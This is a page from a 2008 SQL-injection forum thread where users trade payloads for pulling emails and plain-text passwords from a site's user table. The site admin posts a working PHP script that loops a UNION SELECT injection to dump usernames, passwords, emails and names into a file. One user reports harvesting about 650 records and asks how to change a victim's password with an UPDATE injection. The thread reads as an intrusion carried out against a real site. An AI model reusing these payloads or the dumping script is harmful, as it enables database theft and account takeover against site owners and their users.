 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 Posted: Sat Feb 09, 2008 7:09 pm |
 |
|
| Panic_Mode |
| Active user |
 |
|
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
 |
|
 |
|
| gtal3x wrote: | why not do it str8?
| Code: | | UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,CONCAT_WS(CHAR(58),mail,password)+FROM+Users/* |
btw i think the best thing to do is just to dump the sql file, so u have all the emails and password, i guess u r lucky the passwords are plain text? |
Yes the passwords are plain text. How can i dump the file? |
|
|
|
|
|
 |
|
 |
| Posted: Sat Feb 09, 2008 8:33 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Here is my sample script for database table dumping:
| Code: |
<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////
$out_file = './out.txt';
$row_count = 2640;
$url_pattern = 'http://target.com/?id=0+UNION+ALL+SELECT+1,2,3,CONCAT(0x5e5e5e,username,0x7c,pass,0x7c,email,0x7c,firstname,0x7c,lastname,0x5e5e5e),8,9+FROM+users+LIMIT+%d,1/*';
////////////////////////////////////////////////////////
for($i = 0; $i < $row_count; $i ++)
{
$url = sprintf($url_pattern, $i);
$buff = file_get_contents($url);
$arr = explode('^^^', $buff);
$line = @trim($arr[1]);
echo "$i--$line--\n";
if(strpos($line, '|') !== false)
{
$line2 = "$i|$line\n";
add_line($line2);
}
}
die("\n\nWork finished!");
/////////////////////////////////////////////////////
function add_line($line)
{
global $out_file;
$fh = fopen($out_file, 'ab');
fwrite($fh, $line);
fclose($fh);
return;
}
?>
|
You must first modify script, so that expected row count and target url will match the needed values.
And please be extra careful with "%d" in LIMIT clause - it must be in right place!
Feedback is welcome - if any problems should occur, let me know  |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 8:53 pm |
|
|
| Panic_Mode |
| Active user |
|
|
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
|
|
|
|
tnx 
I will make the changes as soon as possible to get it to work.
One more thing. I want to change the password of a record and I try this code
| Code: | | ...sin.php?blaID=-60;+UPDATE+table_name+SET+password=0x3131313131+WHERE+column_name+LIKE+0xblablahex/* |
but it seems to be a syntax error... |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 9:01 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Panic_Mode wrote: | tnx
I will make the changes as soon as possible to get it to work.
One more thing. I want to change the password of a record and I try this code
| Code: | | ...sin.php?blaID=-60;+UPDATE+table_name+SET+password=0x3131313131+WHERE+column_name+LIKE+0xblablahex/* |
but it seems to be a syntax error... |
Nop, you can't concatenate multiple queries in mysq/php platform.
Update is possible, if you find sql injection in UPDATE query. Or you have php code execution level. Or you will find PhpMyAdmin interface and get logged in. Or steal credentials, log in as admin or user and change data from user/admin interface |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 9:11 pm |
|
|
| Panic_Mode |
| Active user |
|
|
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
|
|
|
|
| hmm with the passwords I got I can login to the user's panel and get in a page to change some personal information about them (name etc) by using a form, but it doesn't give me the option tou change password. Is there a way to submit update query with the help of that page? |
|
|
|
|
| Posted: Sun Feb 10, 2008 3:24 am |
|
|
| gtal3x |
| Active user |
 |
|
| Joined: Dec 03, 2007 |
| Posts: 33 |
| Location: Ukraine |
|
|
|
|
|
|
waraxe for some reason your script doest work for me, it runs ok, but doesnt save anything in out.txt, the script is easy but i am not good with files functions  ... Basicly it looks strange to me that you have die() before writing the file, i changed it, puted the die() in the end, but still the file comes up empty in the end... |
|
|
|
|
|
|
|
|
| Posted: Sun Feb 10, 2008 4:30 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| gtal3x wrote: | | waraxe for some reason your script doest work for me, it runs ok, but doesnt save anything in out.txt, the script is easy but i am not good with files functions ... Basicly it looks strange to me that you have die() before writing the file, i changed it, puted the die() in the end, but still the file comes up empty in the end... |
Did you use php CLI? From command prompt? Did you saw any error messages? About failed file opening? I suggest to define outfile by full path, or just try without "./", because with "./" CWD (current working directory) is what matters and this can be the problem - file can be written to some other place then expected |
|
|
|
|
|
|
|
|
| Posted: Sun Feb 10, 2008 5:09 am |
|
|
| gtal3x |
| Active user |
|
|
| Joined: Dec 03, 2007 |
| Posts: 33 |
| Location: Ukraine |
|
|
|
|
|
|
| Code: | C:\AppServ\www>php test.p
0----
1----
Work finished! |
Thats what i did, no error at all, but nothing in out.txt, btw tryed on linux is well... |
|
|
|
|
| Posted: Sun Feb 10, 2008 10:52 am |
|
|
| Panic_Mode |
| Active user |
|
|
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
|
|
|
|
Btw waraxe your script worked fine (took about 650 records  ) tnx mate!
I runned it on apache with php 4.x - 5.x support in my machine.
Maybe you wanna test xampp gtal3x (that's the packet I use)
| Code: | | http://www.apachefriends.org/en/xampp.html |
|
|
|
|
|
| Posted: Sun Feb 10, 2008 10:57 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| gtal3x wrote: | | Code: | C:\AppServ\www>php test.p
0----
1----
Work finished! |
Thats what i did, no error at all, but nothing in out.txt, btw tryed on linux is well... |
How can it be, that such simple script is not working in your PC? Try to write some test script with couple of code lines and test for file writing.
And one more thing - try phpinfo() and look for "display_errors" settings! Maybe it's "off". If its off, then turn it on in script's first lines. With "display_errors=Off" you can't see error messages, including file opening errors! |
|
|
|
|
|
|
|
|
| Posted: Sun Feb 10, 2008 10:58 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Panic_Mode wrote: | Btw waraxe your script worked fine (took about 650 records ) tnx mate!
I runned it on apache with php 4.x - 5.x support in my machine.
Maybe you wanna test xampp gtal3x (that's the packet I use)
| Code: | | http://www.apachefriends.org/en/xampp.html |
|
Glad to hear, that script worked |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 3 of 3
Goto page Previous1, 2, 3
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 102
Members: 0
Total: 102
